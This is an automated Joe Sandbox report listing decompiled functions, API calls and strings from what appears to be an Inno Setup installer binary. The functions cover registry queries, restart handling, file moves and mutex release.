Opcode ID: 3f1f852e20762185401cba0ba12560d65db98eef0cfc92f8ffba015679676d3b
Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
Opcode Fuzzy Hash: 3f1f852e20762185401cba0ba12560d65db98eef0cfc92f8ffba015679676d3b
Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00494DBE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00494DBE(void* __ecx, void* __edi, void* __esi) {
				void* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				void* _t39;
				intOrPtr _t41;
				char _t44;
				void* _t45;
				intOrPtr _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t61;

				_t59 = __esi;
				_t58 = __edi;
				_t45 = __ecx;
				if(( *(_t60 - 9) & 0x00000001) != 0 || ( *(_t60 - 9) & 0x00000040) != 0) {
					_t44 = 1;
				} else {
					_t44 = 0;
				}
				_t21 = E00476974(_t44, _t45, 0);
				_t64 = _t21;
				if(_t21 != 0) {
					_t27 =  *0x49a628; // 0x2262410
					SetWindowPos( *(_t27 + 0x20), 0, 0, 0, 0, 0, 0x97);
					_push(_t60);
					_push(0x494e5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					_t32 =  *0x49a628; // 0x2262410
					 *((intOrPtr*)(_t60 - 0x18)) =  *((intOrPtr*)(_t32 + 0x20));
					 *((char*)(_t60 - 0x14)) = 0;
					E004078D4("/INITPROCWND=$%x ", 0, _t60 - 0x18, _t60 - 0x10);
					_push(_t60 - 0x10);
					E0042D2D0(_t60 - 0x1c, _t44, 0, _t58, _t59, _t64);
					_pop(_t39);
					E0040357C(_t39,  *((intOrPtr*)(_t60 - 0x1c)));
					_t41 =  *0x49b450; // 0x0
					E00476C24(_t41, _t44, 0x499088,  *((intOrPtr*)(_t60 - 0x10)), _t58, _t59, _t64);
					_pop(_t57);
					 *[fs:eax] = _t57;
					 *((char*)(_t60 - 1)) = 1;
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E00494EBA);
				E00403400(_t60 - 0x1c);
				return E00403400(_t60 - 0x10);
			}

0x00494dbe
0x00494dbe
0x00494dbe
0x00494dc2
0x00494dce
0x00494dca
0x00494dca
0x00494dca
0x00494dd4
0x00494dd9
0x00494ddb
0x00494df0
0x00494df9
0x00494e00
0x00494e01
0x00494e06
0x00494e09
0x00494e10
0x00494e18
0x00494e1b
0x00494e29
0x00494e31
0x00494e35
0x00494e3d
0x00494e3e
0x00494e4b
0x00494e50
0x00494e57
0x00494e5a
0x00494e91
0x00494e91
0x00494e97
0x00494e9a
0x00494e9d
0x00494ea5
0x00494eb2

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494DF9

Strings

/INITPROCWND=$%x , xrefs: 00494E24
@, xrefs: 00494DC4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: d2d1dd15c77d9dc13def2cd938d3cf206de4a7ac51679d0e4959a98b33c3f143
Instruction ID: 02732182cb7cc3c242b89999aa52cf5d897fd5ad7201844d0be9ad2f2cbadaa1
Opcode Fuzzy Hash: d2d1dd15c77d9dc13def2cd938d3cf206de4a7ac51679d0e4959a98b33c3f143
Instruction Fuzzy Hash: 7A119371A042088FDF01DBA5D841FAE7BE9EB88318F10847BE904E7292D67899058798

Uniqueness

Uniqueness Score: -1.00%

Function 00446A4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00446A4C(intOrPtr* __eax, void* __ebx, char* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v9;
				char _v20;
				char _v24;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _t22;
				intOrPtr _t26;
				char* _t33;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				intOrPtr _t50;

				_t48 = _t49;
				_t50 = _t49 + 0xffffffb0;
				_v80 = 0;
				_v84 = 0;
				_t33 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				_push(_t48);
				_push(0x446dd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				E00402934( &_v76, 0x20);
				_v24 = E00403CA4(_t33);
				_push(_t48);
				_push(0x446b04);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				if(_v8 == 0) {
					E00408BEC("NIL Interface Exception", 1);
					E0040311C();
				}
				_push( &_v20);
				_push(0x800);
				_push(1);
				_push( &_v24);
				_push(0x498734);
				_t22 = _v8;
				_push(_t22);
				if( *((intOrPtr*)( *_t22 + 0x14))() != 0) {
					E00408BEC("Unknown Method", 1);
					E0040311C();
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x446b0b);
				_t26 = _v24;
				_push(_t26);
				L0042CC00();
				return _t26;
			}

0x00446a4d
0x00446a4f
0x00446a57
0x00446a5a
0x00446a5d
0x00446a5f
0x00446a62
0x00446a67
0x00446a68
0x00446a6d
0x00446a70
0x00446a7d
0x00446a89
0x00446a8e
0x00446a8f
0x00446a94
0x00446a97
0x00446a9e
0x00446aac
0x00446ab1
0x00446ab1
0x00446ab9
0x00446aba
0x00446abf
0x00446ac4
0x00446ac5
0x00446aca
0x00446acd
0x00446ad5
0x00446ae3
0x00446ae8
0x00446ae8
0x00446aef
0x00446af2
0x00446af5
0x00446afa
0x00446afd
0x00446afe
0x00446b03

APIs

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

SysFreeString.OLEAUT32(?), ref: 00446AFE

Strings

Unknown Method, xrefs: 00446AD7
NIL Interface Exception, xrefs: 00446AA0

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: 8644278fd13da8ad55c33e871d79fd575bba1fd022dec5432197de0710cda13b
Instruction ID: c91e97682c898982e004f1900ba90c2e3641e7a513101758b9e9268cd1a9d275
Opcode Fuzzy Hash: 8644278fd13da8ad55c33e871d79fd575bba1fd022dec5432197de0710cda13b
Instruction Fuzzy Hash: 94119A707046449FDB04DFA68D51AAE7AACEB0A704F52407AF500E7681D6799D10CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 0042DC64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DC64(void* __eax, char* __edx) {
				int _v16;
				char _v20;
				long _t11;
				signed int _t12;
				signed int _t13;
				void* _t17;
				char* _t18;
				int _t19;

				_t18 = __edx;
				_t17 = __eax;
				_t13 = _t12 & 0xffffff00 | RegQueryValueExA(__eax, __edx, 0, 0, 0, 0) == 0x00000000;
				if(_t13 != 0 && (_t18 == 0 ||  *_t18 == 0) &&  *0x4980dc != 2) {
					_t13 = 0;
					_t19 = 0;
					while(1) {
						_v16 = 2;
						_t11 = RegEnumValueA(_t17, _t19,  &_v20,  &_v16, 0, 0, 0, 0);
						if(_t11 != 0 && _t11 != 0xea) {
							goto L11;
						}
						if(_t11 != 0 || _v20 != 0) {
							_t19 = _t19 + 1;
							continue;
						} else {
							_t13 = 1;
						}
						goto L11;
					}
				}
				L11:
				return _t13;
			}

0x0042dc6a
0x0042dc6c
0x0042dc7f
0x0042dc84
0x0042dc98
0x0042dc9a
0x0042dc9c
0x0042dc9c
0x0042dcb8
0x0042dcbf
0x00000000
0x00000000
0x0042dcca
0x0042dcd6
0x00000000
0x0042dcd2
0x0042dcd2
0x0042dcd2
0x00000000
0x0042dcca
0x0042dc9c
0x0042dcd9
0x0042dce0

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DC78
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCB8

Strings

Inno Setup: No Icons, xrefs: 0042DC76

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: eef023ef8b8ad88b989db02ce622d9f7228f62d4069834f518e35816baea4434
Instruction ID: 115871814a4797d1b76f0c181da6381ec586657a8a684a64479c03ba9ebf50e8
Opcode Fuzzy Hash: eef023ef8b8ad88b989db02ce622d9f7228f62d4069834f518e35816baea4434
Instruction Fuzzy Hash: 69012B71B8537179F73045136D01F7B57889B82B60F65013BF942EA2C0DAD89C04E36E

Uniqueness

Uniqueness Score: -1.00%

Function 00495B02 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00495B02(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t32;
				void* _t35;
				void* _t38;

				_t37 = __esi;
				_t36 = __edi;
				_t26 = __ebx;
				if( *((char*)(_t38 - 1)) != 0) {
					if( *0x49afac != 0) {
						E00456B58("Not restarting Windows because Uninstall is being run from the debugger.", __ebx, __ecx, __edi, __esi);
					} else {
						E00456B58("Restarting Windows.", __ebx, __ecx, __edi, __esi);
						 *0x49b3b5 = 1;
						if(E00454800() == 0) {
							_t18 =  *0x49a628; // 0x2262410
							SetForegroundWindow( *(_t18 + 0x20));
							_push(1);
							_push(1);
							_t21 =  *0x49ad38; // 0x227d27c
							_push(E00403738(_t21));
							_t23 =  *0x49ad30; // 0x227d208
							_t24 = E00403738(_t23);
							_pop(_t35);
							E0047CFE0(_t24, __ebx, 0x30, _t35, __edi, __esi);
						}
					}
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(E00495BA5);
				E00403420(_t38 - 0x34, 2);
				E00403A38(_t38 - 0x2c, _t26, 7, 0x40107c, _t36, _t37);
				return E00403400(_t38 - 8);
			}

0x00495b02
0x00495b02
0x00495b02
0x00495b06
0x00495b0f
0x00495b64
0x00495b11
0x00495b16
0x00495b1b
0x00495b29
0x00495b2b
0x00495b34
0x00495b39
0x00495b3b
0x00495b3d
0x00495b47
0x00495b48
0x00495b4d
0x00495b57
0x00495b58
0x00495b58
0x00495b29
0x00495b0f
0x00495b6b
0x00495b6e
0x00495b71
0x00495b7e
0x00495b90
0x00495b9d

APIs

Part of subcall function 00454800: GetCurrentProcess.KERNEL32(00000028), ref: 0045480F
Part of subcall function 00454800: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454815

SetForegroundWindow.USER32(?), ref: 00495B34

Strings

Restarting Windows., xrefs: 00495B11
Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00495B5F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
API String ID: 3179053593-4147564754
Opcode ID: 66bdaacedb8a45610beddee2d20125154b8e42121436ef7f3c5e6b901cfca238
Instruction ID: 694d077cbb5550d478cb7a92b5dd5bf0ba6dd24c7a52c1ed9a6f9e49195c4d49
Opcode Fuzzy Hash: 66bdaacedb8a45610beddee2d20125154b8e42121436ef7f3c5e6b901cfca238
Instruction Fuzzy Hash: A201F770A04284ABEB02F765E842B9C3FD99B5431DFA0407BF404AB6D3CB3CA945871E

Uniqueness

Uniqueness Score: -1.00%

Function 004742F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004742F4(void* __edi, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t2;
				CHAR* _t8;
				void* _t13;
				void* _t19;

				_t19 = __edi;
				_t21 = _a4 + 0xfffffff0;
				if( *(_a4 + 0xfffffff0) == 0) {
					return _t2;
				} else {
					while(E00406F30( *0x49b150) == 0) {
						E004741A4(0x41, 0x49b150, "DeleteFile", _t19, _t21, __eflags);
						__eflags = 0x41;
						if(0x41 == 0) {
							E00408BC0();
						}
					}
					while(1) {
						_t8 = E00403738( *0x49b150);
						if(MoveFileA(E00403738( *_t21), _t8) != 0) {
							break;
						}
						_t13 = E004741A4(0x40, 0x49b150, "MoveFile", _t19, _t21, __eflags);
						__eflags = _t13;
						if(_t13 == 0) {
							E00408BC0();
						}
					}
					return E00403400(_t21);
				}
			}

0x004742f4
0x00474301
0x00474307
0x00474365
0x00474309
0x00474320
0x00474312
0x00474317
0x00474319
0x0047431b
0x0047431b
0x00474319
0x00474342
0x00474344
0x00474359
0x00000000
0x00000000
0x00474334
0x00474339
0x0047433b
0x0047433d
0x0047433d
0x0047433b
0x00000000
0x0047435d

APIs

Part of subcall function 00406F30: DeleteFileA.KERNEL32(00000000,0049A628,004969ED,00000000,00496A42,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F3B

MoveFileA.KERNEL32 ref: 00474352

Part of subcall function 004741A4: GetLastError.KERNEL32(00000000,00474290,?,?,?,0049B150,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00474317,0049B16C), ref: 004741C5

Strings

MoveFile, xrefs: 0047432D
DeleteFile, xrefs: 0047430B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$DeleteErrorLastMove
String ID: DeleteFile$MoveFile
API String ID: 3195829115-139070271
Opcode ID: 031b8a37cfe901da499c226069c3cd18b9d4165d4d06860ce72184e7ea3fe1f3
Instruction ID: 35a0a26b338b5613561a3cc36d86805e3b55e8e995fc9abc998881b51050af59
Opcode Fuzzy Hash: 031b8a37cfe901da499c226069c3cd18b9d4165d4d06860ce72184e7ea3fe1f3
Instruction Fuzzy Hash: 98F0C2A030010096DA107AAEA5826FB379C8F9139D710C13BBD9C6F383CB3C9C0646AF

Uniqueness

Uniqueness Score: -1.00%

Function 00496300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00496300(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t1;
				int _t9;
				void* _t12;
				void* _t16;
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				intOrPtr _t21;

				_t16 = __edx;
				if( *0x49b465 != 0) {
					E00456B58("Detected restart. Removing temporary directory.", _t12, __ecx, _t18, _t19);
					_push(0x49633b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t21;
					E0047B6F4();
					E0047B3C8(_t12, __ecx, _t16, _t18, _t19);
					_pop(_t17);
					 *[fs:eax] = _t17;
					E004560D8();
					_t9 =  *0x499088; // 0x1
					return TerminateProcess(GetCurrentProcess(), _t9);
				}
				return _t1;
			}

0x00496300
0x0049630d
0x00496314
0x0049631c
0x00496321
0x00496324
0x00496327
0x0049632c
0x00496333
0x00496336
0x0049634a
0x0049634f
0x00000000
0x0049635b
0x00496364

APIs

Part of subcall function 0047B6F4: FreeLibrary.KERNEL32(73900000,0047FBAA), ref: 0047B70A

Part of subcall function 0047B3C8: GetTickCount.KERNEL32 ref: 0047B410

Part of subcall function 004560D8: SendMessageA.USER32 ref: 004560F7

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496C57), ref: 00496355
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496C57), ref: 0049635B

Strings

Detected restart. Removing temporary directory., xrefs: 0049630F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: 74462091f4d0a79b56a72c3bc3e9c533a90eeb28a6d824edd8719864a272ed67
Instruction ID: f434d9678a6a31a85f0ef440eaa6fab1b5385b5ae403e44371098c14193c2303
Opcode Fuzzy Hash: 74462091f4d0a79b56a72c3bc3e9c533a90eeb28a6d824edd8719864a272ed67
Instruction Fuzzy Hash: 59E055712082447EDA1273A7BC139AB7F9CD741768792043BFC0882442C63D0804857C

Uniqueness

Uniqueness Score: -1.00%

Function 004969E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004969E5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t29;
				intOrPtr _t30;

				_t1 = _t29 - 0x14; // 0x496e5c
				E00406F30( *_t1);
				E00406F30( *((intOrPtr*)(_t29 - 0x10)));
				_push(_t29);
				_push( *[fs:eax]);
				 *[fs:eax] = _t30;
				E00496628(__ebx, __ecx, __edi, __esi, __eflags);
				_pop(_t25);
				 *[fs:eax] = _t25;
				_t26 = 0x496a12;
				 *[fs:eax] = _t26;
				_push(E00496A49);
				if( *(_t29 - 8) != 0) {
					ReleaseMutex( *(_t29 - 8));
					return CloseHandle( *(_t29 - 8));
				}
				return 0;
			}

0x004969e5
0x004969e8
0x004969f0
0x004969f7
0x004969fd
0x00496a00
0x00496a03
0x00496a0a
0x00496a0d
0x00496a1e
0x00496a21
0x00496a24
0x00496a2d
0x00496a33
0x00000000
0x00496a3c
0x00496a41

APIs

Part of subcall function 00406F30: DeleteFileA.KERNEL32(00000000,0049A628,004969ED,00000000,00496A42,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F3B

ReleaseMutex.KERNEL32(00000000,00496A49,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496A64,?,?,00000000), ref: 00496A33
CloseHandle.KERNEL32(00000000,00000000,00496A49,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496A64), ref: 00496A3C

Strings

.lst, xrefs: 004967E0
/REG, xrefs: 00496701
.msg, xrefs: 004967C6
%nI, xrefs: 004966F1, 004966FE, 00496715, 00496722, 004967B6, 004967C0, 004967D0, 004967DA
Inno-Setup-RegSvr-Mutex, xrefs: 00496759
/REGU, xrefs: 00496725
\nI, xrefs: 004967DD, 004967EA, 004969E5, 0049683B
Setup, xrefs: 0049673B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseDeleteFileHandleMutexRelease
String ID: %nI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$\nI
API String ID: 3841931355-3190912533
Opcode ID: 30bf0bb91cb104a3c65cecc3f15a6b93e61117046b5e5409cbff438ae1072373
Instruction ID: 887a9e1efbe808a1e74057037fa5da8bf73f20d41789fa1c587db5377786c5da
Opcode Fuzzy Hash: 30bf0bb91cb104a3c65cecc3f15a6b93e61117046b5e5409cbff438ae1072373
Instruction Fuzzy Hash: CFF082316186009EDF159BA5E85296E7BA4E749314FA3487BF800B2981D93C5C10C918

Uniqueness

Uniqueness Score: -1.00%

Function 00421D10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421D10(intOrPtr __eax) {
				intOrPtr _t3;
				void* _t8;
				struct HWND__* _t9;
				intOrPtr _t12;
				intOrPtr _t14;

				_t3 = __eax;
				_t14 =  *((intOrPtr*)(__eax + 0x108));
				if(_t14 == 0 ||  *((intOrPtr*)(__eax + 0x12c)) != 0) {
					_t12 = _t3;
				} else {
					_t12 = _t14;
				}
				SetFocus(E004181C8(_t12));
				_t8 = E004181C8(_t12);
				_t9 = GetFocus();
				if(_t8 == _t9) {
					return E00415228(_t12, 0, 0xb029, 0);
				}
				return _t9;
			}

0x00421d10
0x00421d12
0x00421d1a
0x00421d29
0x00421d25
0x00421d25
0x00421d25
0x00421d33
0x00421d3a
0x00421d41
0x00421d48
0x00000000
0x00421d55
0x00421d5c

APIs

SetFocus.USER32(00000000,coI,00000000,00421A5C,00000000,00000000,004185E0,00000000,00000001,?,?,00464756,00000001,00000000,00000000,00469CA1), ref: 00421D33
GetFocus.USER32(00000000,coI,00000000,00421A5C,00000000,00000000,004185E0,00000000,00000001,?,?,00464756,00000001,00000000,00000000,00469CA1), ref: 00421D41

Strings

coI, xrefs: 00421D11

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Focus
String ID: coI
API String ID: 2734777837-1488265783
Opcode ID: 6803450af1749c1f343997f6079699f7449cc7a208dc82f9e235c9bb2b5f2d47
Instruction ID: 46719000c87614a5dc43871479ffc91fe90331590ae2374df4c89699cd139320
Opcode Fuzzy Hash: 6803450af1749c1f343997f6079699f7449cc7a208dc82f9e235c9bb2b5f2d47
Instruction Fuzzy Hash: F3E0923170022496EB14367A78C57AB11884B74354F54697FF5029B253DE7C9C850648

Uniqueness

Uniqueness Score: -1.00%

Function 00456854 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00456854(struct _SYSTEMTIME* __eax, void* __ecx) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME* _t11;
				void* _t17;

				_t11 = __eax;
				GetSystemTimeAsFileTime( &_v12);
				E00430824( &_v12, 0x49afcc, _t17);
				return FileTimeToSystemTime( &_v12, _t11);
			}

0x0045685b
0x00456861
0x0045686e
0x00456881

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456861
FileTimeToSystemTime.KERNEL32(00000000,\nI,00000000,0049A628), ref: 00456878

Strings

\nI, xrefs: 00456873

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Time$FileSystem
String ID: \nI
API String ID: 2086374402-1855566299
Opcode ID: d10593feda3b52d56be89682fb11ad5fac7f13c2d1c7acc4f1884032c785b7a1
Instruction ID: 5eeb9a01154d5d1569ffe6d2c3dae9475e6f472a06e877563c0ce66d36d1021b
Opcode Fuzzy Hash: d10593feda3b52d56be89682fb11ad5fac7f13c2d1c7acc4f1884032c785b7a1
Instruction Fuzzy Hash: CED05B7340820C66CF00B1E5AC828CFB7ECD504334F100677A118A25C1FF35A651459C

Uniqueness

Uniqueness Score: -1.00%

Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403344() {

				E004032FC();
				 *0x49a014 = GetModuleHandleA(0);
				 *0x49a01c = GetCommandLineA();
				 *0x49a018 = 0xa;
				return 0x40309c;
			}

0x00403344
0x00403350
0x0040335b
0x00403361
0x00403370

APIs

GetModuleHandleA.KERNEL32(00000000,00496EB2), ref: 0040334B
GetCommandLineA.KERNEL32(00000000,00496EB2), ref: 00403356

Strings

4u, xrefs: 0040335B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

